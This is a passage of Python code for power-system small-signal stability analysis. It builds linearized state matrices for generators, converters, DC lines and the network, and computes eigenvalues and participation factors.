i_d / (gpr.Tj * gpr.cosn), 0, 0, 0, 0, psi_q / (gpr.Tj * gpr.cosn), -psi_d / (gpr.Tj * gpr.cosn), 0,
0, 0],
[0, gpr.wn * psi_q, 0, gpr.wn * w, 0, 0, 0, 0, gpr.ra * gpr.wn, 0, 0, 0, 0],
[0, -gpr.wn * psi_d, -gpr.wn * w, 0, 0, 0, 0, 0, 0, gpr.ra * gpr.wn, 0, 0, 0],
[0, 0, 0, 0, -gpr.rfd * gpr.wn * gpr.x1d_loop / gpr.xdet_d,
-gpr.rfd * gpr.wn * (-gpr.xad - gpr.xrld) / gpr.xdet_d, 0, 0, -gpr.kfd * gpr.rfd * gpr.wn, 0,
gpr.rfd * gpr.wn / gpr.xadu, 0, 0],
[0, 0, 0, 0, -gpr.r1d * gpr.wn * (-gpr.xad - gpr.xrld) / gpr.xdet_d,
-gpr.r1d * gpr.wn * gpr.xfd_loop / gpr.xdet_d, 0, 0, -gpr.k1d * gpr.r1d * gpr.wn, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -gpr.r1q * gpr.wn * gpr.x2q_loop / gpr.xdet_q,
-gpr.r1q * gpr.wn * (-gpr.xaq - gpr.xrlq) / gpr.xdet_q, 0, -gpr.k1q * gpr.r1q * gpr.wn, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -gpr.r2q * gpr.wn * (-gpr.xaq - gpr.xrlq) / gpr.xdet_q,
-gpr.r2q * gpr.wn * gpr.x1q_loop / gpr.xdet_q, 0, -gpr.k2q * gpr.r2q * gpr.wn, 0, 0, 0],
[0, gpr.wn * (-gpr.k1q * psi_1q - gpr.k2q * psi_2q + gpr.xqpp * i_q) / gpr.xdpp, 0, 0, gpr.wn * (
-gpr.k1d * gpr.r1d * (
-gpr.xad - gpr.xrld) / gpr.xdet_d - gpr.kfd * gpr.rfd * gpr.x1d_loop / gpr.xdet_d) / gpr.xdpp,
gpr.wn * (-gpr.k1d * gpr.r1d * gpr.xfd_loop / gpr.xdet_d - gpr.kfd * gpr.rfd * (
-gpr.xad - gpr.xrld) / gpr.xdet_d) / gpr.xdpp, -gpr.k1q * gpr.wn * w / gpr.xdpp,
-gpr.k2q * gpr.wn * w / gpr.xdpp,
gpr.wn * (-gpr.k1d ** 2 * gpr.r1d - gpr.kfd ** 2 * gpr.rfd - gpr.ra) / gpr.xdpp,
gpr.wn * gpr.xqpp * w / gpr.xdpp, gpr.kfd * gpr.rfd * gpr.wn / (gpr.xadu * gpr.xdpp), 0, 0],
[0, gpr.wn * (gpr.k1d * psi_1d + gpr.kfd * psi_fd - gpr.xdpp * i_d) / gpr.xqpp, 0, 0,
gpr.kfd * gpr.wn * w / gpr.xqpp, gpr.k1d * gpr.wn * w / gpr.xqpp, gpr.wn * (
-gpr.k1q * gpr.r1q * gpr.x2q_loop / gpr.xdet_q - gpr.k2q * gpr.r2q * (
-gpr.xaq - gpr.xrlq) / gpr.xdet_q) / gpr.xqpp, gpr.wn * (-gpr.k1q * gpr.r1q * (
-gpr.xaq - gpr.xrlq) / gpr.xdet_q - gpr.k2q * gpr.r2q * gpr.x1q_loop / gpr.xdet_q) / gpr.xqpp,
-gpr.wn * gpr.xdpp * w / gpr.xqpp,
gpr.wn * (-gpr.k1q ** 2 * gpr.r1q - gpr.k2q ** 2 * gpr.r2q - gpr.ra) / gpr.xqpp, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / gpr.Te, -gpr.Kc / gpr.Te, gpr.Kc / (gpr.Tc * gpr.Te)],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / gpr.Tm, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0],
])
Big = np.array([[0, 0],
[psi_q / (gpr.Tj * gpr.cosn), -psi_d / (gpr.Tj * gpr.cosn)],
[gpr.ra * gpr.wn, 0],
[0, gpr.ra * gpr.wn],
[-gpr.kfd * gpr.rfd * gpr.wn, 0],
[-gpr.k1d * gpr.r1d * gpr.wn, 0],
[0, -gpr.k1q * gpr.r1q * gpr.wn],
[0, -gpr.k2q * gpr.r2q * gpr.wn],
[gpr.wn * (-gpr.k1d ** 2 * gpr.r1d - gpr.kfd ** 2 * gpr.rfd - gpr.ra) / gpr.xdpp,
gpr.wn * gpr.xqpp * w / gpr.xdpp],
[-gpr.wn * gpr.xdpp * w / gpr.xqpp,
gpr.wn * (-gpr.k1q ** 2 * gpr.r1q - gpr.k2q ** 2 * gpr.r2q - gpr.ra) / gpr.xqpp],
[0, 0],
[0, 0],
[0, 0],
])
Bvg = np.array([[0, 0],
[0, 0],
[gpr.wn, 0],
[0, gpr.wn],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[-gpr.wn / gpr.xdpp, 0],
[0, -gpr.wn / gpr.xqpp],
[0, 0],
[Vd / (gpr.Tm * np.sqrt(Vd ** 2 + Vq ** 2)), Vq / (gpr.Tm * np.sqrt(Vd ** 2 + Vq ** 2))],
[0, 0],
])
Tg = np.array([[np.cos(delta), np.sin(delta)],
[-np.sin(delta), np.cos(delta)]])
# Zg = np.array([[-gpr.ra,gpr.xqpp],[-gpr.xdpp,-gpr.ra]])
Rvg = np.zeros((2, gpr.nx))
Rvg[0, gpr.x_idx['d']] = Vq
Rvg[1, gpr.x_idx['d']] = -Vd
Rig = np.zeros((2, gpr.nx))
Rig[0, gpr.x_idx['d']] = i_q
Rig[1, gpr.x_idx['d']] = -i_d
Pg = np.zeros((2, gpr.nx))
Pg[0, gpr.x_idx['Id']] = 1
Pg[1, gpr.x_idx['Iq']] = 1
Pg[0, gpr.x_idx['d']] = -i_q
Pg[1, gpr.x_idx['d']] = i_d
# Cg = Tg.T@(np.linalg.inv(Zg)@(Rvg-Pg)-Rig)
Cg = Tg.T @ Pg
# Cdc = np.zeros((1,gpr.nx))
# Cdc[0,gpr.x_idx['Idc']] = 1
Dg = np.zeros((2, 2))
A = Ag + Bvg @ Rvg
B = Bvg @ Tg
C = Cg * gpr.Sn / gpr.Sb
D = Dg
return A, B, C, D
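# In the closed form above, A = Ag + Bvg @ Rvg folds the rotor-angle dependence
# of the terminal voltage into the state matrix: v_d = vx*cos(d) + vy*sin(d)
# and v_q = -vx*sin(d) + vy*cos(d), so d(v_d)/dd = v_q and d(v_q)/dd = -v_d,
# which is exactly the nonzero column of Rvg.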
def network_linear(npr):
    # NOTE: per-branch series parameters (R, L) are derived from Ybus inside
    # the assembly loop below; a separate pre-pass is unnecessary.
s = 2 * (npr.n_bus + npr.n_br)
Nb = npr.n_bus * 2
A = np.zeros((s, s))
B = np.zeros((s, Nb))
for n in range(0, Nb, 2):
A[n, n + 1] = npr.wn
A[n + 1, n] = -npr.wn
ib = Nb
for n in range(npr.n_bus):
Csh = np.imag(npr.Ybus[n].sum())
        if Csh <= 1e-6:
            # Guard: buses without physical shunt capacitance get a small
            # fictitious one so the voltage state equations stay well defined.
            Csh = 0.001
for i, (f, t) in enumerate(zip(npr.f, npr.t)):
R = np.real(-1 / npr.Ybus[f, t])
L = np.imag(-1 / npr.Ybus[f, t])
if f == n:
A[2 * n, 2 * i + ib] = -npr.wn / Csh
A[2 * n + 1, 2 * i + ib + 1] = -npr.wn / Csh
if t == n:
A[2 * n, 2 * i + ib] = npr.wn / Csh
A[2 * n + 1, 2 * i + ib + 1] = npr.wn / Csh
A[2 * i + ib, 2 * n] = -npr.wn / L
A[2 * i + ib, 2 * f] = npr.wn / L
A[2 * i + ib, 2 * i + ib] = -R * npr.wn / L
A[2 * i + ib, 2 * i + ib + 1] = npr.wn
A[2 * i + ib + 1, 2 * n + 1] = -npr.wn / L
A[2 * i + ib + 1, 2 * f + 1] = npr.wn / L
A[2 * i + ib + 1, 2 * i + ib] = -npr.wn
A[2 * i + ib + 1, 2 * i + ib + 1] = -R * npr.wn / L
B[2 * n, 2 * n] = npr.wn / Csh
B[2 * n + 1, 2 * n + 1] = npr.wn / Csh
# ###
# Ybus_xy = np.zeros((Nb,Nb))
# for i in range(npr.n_bus):
# k = 2*i
# Ybus_xy[k,k] = npr.Ybus[i,i].real
# Ybus_xy[k,k+1] = -npr.Ybus[i,i].imag
# Ybus_xy[k+1,k] = npr.Ybus[i,i].imag
# Ybus_xy[k+1,k+1] = npr.Ybus[i,i].real
# for f,t in zip(npr.f,npr.t):
# f2 = 2*f
# t2 = 2*t
# Ybus_xy[f2,t2] = npr.Ybus[f,t].real
# Ybus_xy[f2,t2+1] = -npr.Ybus[f,t].imag
# Ybus_xy[f2+1,t2] = npr.Ybus[f,t].imag
# Ybus_xy[f2+1,t2+1] = npr.Ybus[f,t].real
# Ybus_xy[t2,f2] = npr.Ybus[t,f].real
# Ybus_xy[t2,f2+1] = -npr.Ybus[t,f].imag
# Ybus_xy[t2+1,f2] = npr.Ybus[t,f].imag
# Ybus_xy[t2+1,f2+1] = npr.Ybus[t,f].real
# ###
C = np.zeros((Nb, s))
v_inds = range(Nb)
C[v_inds, v_inds] = 1
# D = np.linalg.inv(Ybus_xy)
D = np.zeros((Nb, Nb))
return A, B, C, D
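# Minimal assembly sketch for network_linear on a hypothetical 2-bus, 1-branch
# grid. The SimpleNamespace mimics the npr interface read by the function
# (Ybus, f, t, n_bus, n_br, wn); values are illustrative only.
def _demo_network_linear():
    import numpy as np
    from types import SimpleNamespace
    z = 0.01 + 0.1j  # series branch impedance (pu)
    Ybus = np.array([[1 / z, -1 / z],
                     [-1 / z, 1 / z]])
    npr = SimpleNamespace(Ybus=Ybus, f=[0], t=[1], n_bus=2, n_br=1,
                          wn=2 * np.pi * 50)
    A, B, C, D = network_linear(npr)
    # two states per bus voltage plus two per branch current
    return A.shape == (2 * (npr.n_bus + npr.n_br), 2 * (npr.n_bus + npr.n_br))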
def calc_eigenvalues_old(x0, npr, models):
"""
Parameters
----------
x0 : ndarray
Initial state vector.
npr : network_parameters
Object containing network parameters.
models : list
List of models.
Returns
-------
lambda_1 : ndarray
Eigenvalue vector.
P_1 : ndarray
Participation factor array.
Amat : ndarray
System A matrix.
"""
inw = npr.x_ind
n_vsc = 0
n_gen = 0
size = (len(x0), len(x0))
A_tilde = np.zeros(size)
B_tilde = np.zeros(size)
C_tilde = np.zeros(size)
an, bn, cn, dn = network_linear(npr)
A_tilde[inw:, inw:] = an
for model in models:
if model.type == ModelType.VSC_1:
# break
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
Theta_pll = x0[model.x_ind + model.x_idx['Theta']]
vd = vx * np.cos(Theta_pll) + vy * np.sin(Theta_pll)
vq = -vx * np.sin(Theta_pll) + vy * np.cos(Theta_pll)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
avsc, bvsc, cvsc, dvsc = converter_linear(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = avsc
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bvsc
            B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dvsc  # bus_idx (=2*bus_ind) indexes bn, matching the generator branch
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2,
bus_idx:bus_idx + 2] @ cvsc
n_vsc += 1
elif model.type == ModelType.gen:
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
d = x0[model.x_ind + model.x_idx['d']]
vd = vx * np.cos(d) + vy * np.sin(d)
vq = -vx * np.sin(d) + vy * np.cos(d)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
ag, bg, cg, dg = sixth_order_model_avr(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = ag
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bg
B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dg
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ cg
n_gen += 1
Amat = A_tilde + B_tilde + C_tilde
lambda_1, Phi_1 = np.linalg.eig(Amat)
Psi_1 = np.linalg.inv(Phi_1)
P_1 = Phi_1 * Psi_1.T
# # Set Zero mode eigenvalues to zero # TODO need to confirm that this is ok!
# zm = np.where(abs(P_1) > 1)[1]
# lambda_1[zm] = 0
return lambda_1, P_1, Amat
def calc_eigenvalues(x0, npr, models, tol=1e-6):
"""
Parameters
----------
x0 : ndarray
Initial state vector.
npr : network_parameters
Object containing network parameters.
    models : list
        List of models.
    tol : float, optional
        Eigenvalues with real-part magnitude below tol are set to zero.
Returns
-------
lambda_1 : ndarray
Eigenvalue vector.
P_1 : ndarray
Participation factor array.
Amat : ndarray
System A matrix.
"""
inw = npr.x_ind
n_vsc = 0
n_gen = 0
size = (len(x0), len(x0))
A_tilde = np.zeros(size)
B_tilde = np.zeros(size)
C_tilde = np.zeros(size)
an, bn, cn, dn = network_linear(npr)
A_tilde[inw:, inw:] = an
for model in models:
if model.type == ModelType.VSC_1:
# break
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
            if model.x_dc != -1:
vdc = x0[model.x_dc]
else:
vdc = 1
Theta_pll = x0[model.x_ind + model.x_idx['Theta']]
vd = vx * np.cos(Theta_pll) + vy * np.sin(Theta_pll)
vq = -vx * np.sin(Theta_pll) + vy * np.cos(Theta_pll)
uo = np.array([vd, vq, vdc])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
# if model.ctrl == CtrlMode.P_Vac:
# avsc,bacvsc,bdcvsc,cacvsc,cdcvsc,dvsc = vsc_linear_1(xo,uo,model)
# # A,B,Bvdc,C,Cdc,D
# # break
# # B_tilde[model.x_ind:model.x_ind+model.nx,model.x_dc:model.x_dc+1]=bdcvsc # TODO add DC side
# # C_tilde[idx:idx+1,model.x_ind:model.x_ind+model.nx]=bdcvsc
# elif model.ctrl == CtrlMode.Vdc_Q:
# avsc,bacvsc,bdcvsc,cacvsc,cdcvsc,dvsc = vsc_linear_2(xo,uo,model)
# elif 'Idc' in model.x_idx:
# avsc,bacvsc,cacvsc,dvsc = converter_linear(xo,uo,model)
# else:
# # avsc,bvsc,cvsc,dvsc = converter_linear(xo,uo,model)
# avsc,bacvsc,cacvsc,dvsc = c_linear0(xo,uo,model)
# avsc,bacvsc,cacvsc,dvsc = converter_linear(xo,uo,model)
avsc, bacvsc, cacvsc, dvsc = model.abcd_linear(xo, uo)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = avsc
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bacvsc
            B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dvsc  # bus_idx (=2*bus_ind) indexes bn, matching the generator branch
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2,
bus_idx:bus_idx + 2] @ cacvsc
# B_tilde[model.x_ind:model.x_ind+model.nx,inw:] = bacvsc@cn[bus_idx:bus_idx+2] # XXX alternative way
# if not model.x_dc == -1:
# B_tilde[model.x_ind:model.x_ind+model.nx,[model.x_dc]]=bdcvsc
n_vsc += 1
elif model.type == ModelType.GEN_ORD_6:
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
d = x0[model.x_ind + model.x_idx['d']]
vd = vx * np.cos(d) + vy * np.sin(d)
vq = -vx * np.sin(d) + vy * np.cos(d)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
ag, bg, cg, dg = sixth_order_model_avr(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = ag
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bg
B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dg
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ cg
n_gen += 1
elif model.type == ModelType.GEN_2_2:
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
d = x0[model.x_ind + model.x_idx['d']]
vd = vx * np.cos(d) + vy * np.sin(d)
vq = -vx * np.sin(d) + vy * np.cos(d)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
# ag,bg,cg,dg = standard_model_linear(xo,uo,model)
ag, bg, cg, dg = model.abcd_linear(xo, uo)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = ag
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bg
B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dg
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ cg
n_gen += 1
elif model.type == ModelType.DC_LINE:
# break
mf = models[model.f]
mt = models[model.t]
If = -x0[mf.x_ind + mf.x_idx['Idc']] * mf.Sn / npr.Sb
            It = x0[mt.x_ind + mt.x_idx['Idc']] * mt.Sn / npr.Sb  # overwritten just below
It = -If # TODO check the initialization. In steady state If=-It (if G=0)
uo = np.array([If, It])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
acb, bcb, ccb, dcb = dc_cable_linear(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = acb
# cvsc[np.array([0,1]),np.array([mf.x_idx['Idc'],mt.x_idx['Idc']])]
# B_tilde[model.x_ind:model.x_ind+model.nx,idx:idx+2]=bcb
# B_tilde[idx:idx+2,idx:idx+2]=bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@dcb
cvsc = np.zeros((1, mf.nx))
cvsc[0, mf.x_idx['Idc']] = 1
C_tilde[model.x_ind:model.x_ind + model.nx, mf.x_ind:mf.x_ind + mf.nx] = bcb[:, [0]] @ cvsc
C_tilde[model.x_ind:model.x_ind + model.nx, mt.x_ind:mt.x_ind + mt.nx] = bcb[:, [1]] @ cvsc
elif model.type == ModelType.VS:
# break
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
uo = np.array([vx, vy])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
avs, bvs, cvs, dvs = vs_linear(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = avs
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bvs
B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dvs
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2,
bus_idx:bus_idx + 2] @ cvs
Amat = A_tilde + B_tilde + C_tilde
lambda_1, Phi_1 = np.linalg.eig(Amat)
    # Zero out eigenvalues whose real-part magnitude is below the tolerance
lambda_1[abs(np.real(lambda_1)) < tol] = 0
Psi_1 = np.linalg.inv(Phi_1)
P_1 = Phi_1 * Psi_1.T
    # Set zero-mode eigenvalues to zero # TODO need to confirm that this is ok!
    # (mode index = column of P_1, as in calc_eigenvalues_old)
    zm = np.where(abs(P_1) > 1.1)[1]
lambda_1[zm] = 0
return lambda_1, P_1, Amat
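# The participation factors above follow P[i, k] = Phi[i, k] * Psi[k, i] for
# state i and mode k, so each column of P sums to one (Psi @ Phi = I).
# Stand-alone illustration on a lightly damped oscillator (hypothetical data):
def _demo_participation_factors():
    import numpy as np
    Amat = np.array([[0.0, 1.0],
                     [-4.0, -0.4]])
    _, Phi = np.linalg.eig(Amat)
    Psi = np.linalg.inv(Phi)
    P = Phi * Psi.T  # element-wise product, as in calc_eigenvalues
    return np.allclose(P.sum(axis=0), 1.0)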
def calc_state_matrix(x0, npr, models, tol=1e-6):
"""
Parameters
----------
x0 : ndarray
Initial state vector.
npr : network_parameters
Object containing network parameters.
models : list
List of models.
    tol : float, optional
        Unused; kept for interface compatibility with calc_eigenvalues.
    Returns
    -------
    Amat : ndarray
        System A matrix.
"""
inw = npr.x_ind
n_vsc = 0
n_gen = 0
size = (len(x0), len(x0))
A_tilde = np.zeros(size)
B_tilde = np.zeros(size)
C_tilde = np.zeros(size)
an, bn, cn, dn = network_linear(npr)
A_tilde[inw:, inw:] = an
for model in models:
if model.type == ModelType.VSC_1:
# break
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
            if model.x_dc != -1:
vdc = x0[model.x_dc]
else:
vdc = 1
Theta_pll = x0[model.x_ind + model.x_idx['Theta']]
vd = vx * np.cos(Theta_pll) + vy * np.sin(Theta_pll)
vq = -vx * np.sin(Theta_pll) + vy * np.cos(Theta_pll)
uo = np.array([vd, vq, vdc])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
# if model.ctrl == CtrlMode.P_Vac:
# avsc,bacvsc,bdcvsc,cacvsc,cdcvsc,dvsc = vsc_linear_1(xo,uo,model)
# # A,B,Bvdc,C,Cdc,D
# # break
# # B_tilde[model.x_ind:model.x_ind+model.nx,model.x_dc:model.x_dc+1]=bdcvsc # TODO add DC side
# # C_tilde[idx:idx+1,model.x_ind:model.x_ind+model.nx]=bdcvsc
# elif model.ctrl == CtrlMode.Vdc_Q:
# avsc,bacvsc,bdcvsc,cacvsc,cdcvsc,dvsc = vsc_linear_2(xo,uo,model)
# elif 'Idc' in model.x_idx:
# avsc,bacvsc,cacvsc,dvsc = converter_linear(xo,uo,model)
# else:
# # avsc,bvsc,cvsc,dvsc = converter_linear(xo,uo,model)
# avsc,bacvsc,cacvsc,dvsc = c_linear0(xo,uo,model)
# avsc,bacvsc,cacvsc,dvsc = converter_linear(xo,uo,model)
avsc, bacvsc, cacvsc, dvsc = model.abcd_linear(xo, uo)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = avsc
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bacvsc
            B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dvsc  # bus_idx (=2*bus_ind) indexes bn, matching the generator branch
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2,
bus_idx:bus_idx + 2] @ cacvsc
# B_tilde[model.x_ind:model.x_ind+model.nx,inw:] = bacvsc@cn[bus_idx:bus_idx+2] # XXX alternative way
# if not model.x_dc == -1:
# B_tilde[model.x_ind:model.x_ind+model.nx,[model.x_dc]]=bdcvsc
n_vsc += 1
elif model.type == ModelType.GEN_ORD_6:
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
d = x0[model.x_ind + model.x_idx['d']]
vd = vx * np.cos(d) + vy * np.sin(d)
vq = -vx * np.sin(d) + vy * np.cos(d)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
ag, bg, cg, dg = sixth_order_model_avr(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = ag
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bg
B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dg
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ cg
n_gen += 1
elif model.type == ModelType.GEN_2_2:
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
d = x0[model.x_ind + model.x_idx['d']]
vd = vx * np.cos(d) + vy * np.sin(d)
vq = -vx * np.sin(d) + vy * np.cos(d)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
# ag,bg,cg,dg = standard_model_linear(xo,uo,model)
ag, bg, cg, dg = model.abcd_linear(xo, uo)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = ag
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bg
B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dg
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ cg
n_gen += 1
elif model.type == ModelType.DC_LINE:
# break
mf = models[model.f]
mt = models[model.t]
If = -x0[mf.x_ind + mf.x_idx['Idc']] * mf.Sn / npr.Sb
            It = x0[mt.x_ind + mt.x_idx['Idc']] * mt.Sn / npr.Sb  # overwritten just below
It = -If # TODO check the initialization. In steady state If=-It (if G=0)
uo = np.array([If, It])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
acb, bcb, ccb, dcb = dc_cable_linear(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = acb
# cvsc[np.array([0,1]),np.array([mf.x_idx['Idc'],mt.x_idx['Idc']])]
# B_tilde[model.x_ind:model.x_ind+model.nx,idx:idx+2]=bcb
# B_tilde[idx:idx+2,idx:idx+2]=bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@dcb
cvsc = np.zeros((1, mf.nx))
cvsc[0, mf.x_idx['Idc']] = 1
C_tilde[model.x_ind:model.x_ind + model.nx, mf.x_ind:mf.x_ind + mf.nx] = bcb[:, [0]] @ cvsc
C_tilde[model.x_ind:model.x_ind + model.nx, mt.x_ind:mt.x_ind + mt.nx] = bcb[:, [1]] @ cvsc
elif model.type == ModelType.VS:
# break
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
uo = np.array([vx, vy])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
avs, bvs, cvs, dvs = vs_linear(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = avs
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bvs
B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dvs
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2,
bus_idx:bus_idx + 2] @ cvs
Amat = A_tilde + B_tilde + C_tilde
return Amat
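# Cross-check sketch (assumption: the caller supplies the nonlinear right-hand
# side f(x) of the assembled system): the analytic Amat from calc_state_matrix
# can be validated against a central finite-difference Jacobian at x0.
def finite_difference_state_matrix(f, x0, eps=1e-6):
    """Approximate A = df/dx at x0 by central differences."""
    import numpy as np
    x0 = np.asarray(x0, dtype=float)
    n = len(x0)
    A = np.zeros((n, n))
    for j in range(n):
        dx = np.zeros(n)
        dx[j] = eps
        A[:, j] = (np.asarray(f(x0 + dx)) - np.asarray(f(x0 - dx))) / (2 * eps)
    return A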
def calc_eigenvalues_test(x0, npr, models, tol=1e-6):
inw = npr.x_ind
# n_vsc = 0
# n_gen = 0
Nm = sum([m.nx for m in models])
Nb = npr.n_bus
Nbr = npr.n_br
Nn = 2 * Nb + 2 * Nbr
A_tilde = np.zeros((Nm, Nm))
B_tilde = np.zeros((Nm, 2 * Nb))
C_tilde = np.zeros((2 * Nb, Nm))
D_tilde = np.zeros((2 * Nb, Nn))
for model in models:
if model.type == ModelType.VSC_1:
# break
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
            if model.x_dc != -1:
vdc = x0[model.x_dc]
else:
vdc = 1
Theta_pll = x0[model.x_ind + model.x_idx['Theta']]
vd = vx * np.cos(Theta_pll) + vy * np.sin(Theta_pll)
vq = -vx * np.sin(Theta_pll) + vy * np.cos(Theta_pll)
uo = np.array([vd, vq, vdc])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
# if model.ctrl == CtrlMode.P_Vac:
# avsc,bacvsc,bdcvsc,cacvsc,cdcvsc,dvsc = vsc_linear_1(xo,uo,model)
# # A,B,Bvdc,C,Cdc,D
# # break
# # B_tilde[model.x_ind:model.x_ind+model.nx,model.x_dc:model.x_dc+1]=bdcvsc # TODO add DC side
# # C_tilde[idx:idx+1,model.x_ind:model.x_ind+model.nx]=bdcvsc
# elif model.ctrl == CtrlMode.Vdc_Q:
# avsc,bacvsc,bdcvsc,cacvsc,cdcvsc,dvsc = vsc_linear_2(xo,uo,model)
# elif 'Idc' in model.x_idx:
# avsc,bacvsc,cacvsc,dvsc = converter_linear(xo,uo,model)
# else:
# # avsc,bvsc,cvsc,dvsc = converter_linear(xo,uo,model)
am, bm, cm, dm = c_linear0(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = am
B_tilde[model.x_ind:model.x_ind + model.nx, bus_idx:bus_idx + 2] = bm
C_tilde[bus_idx:bus_idx + 2, model.x_ind:model.x_ind + model.nx] = cm
D_tilde[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] = dm
# print(model,cacvsc@xo)
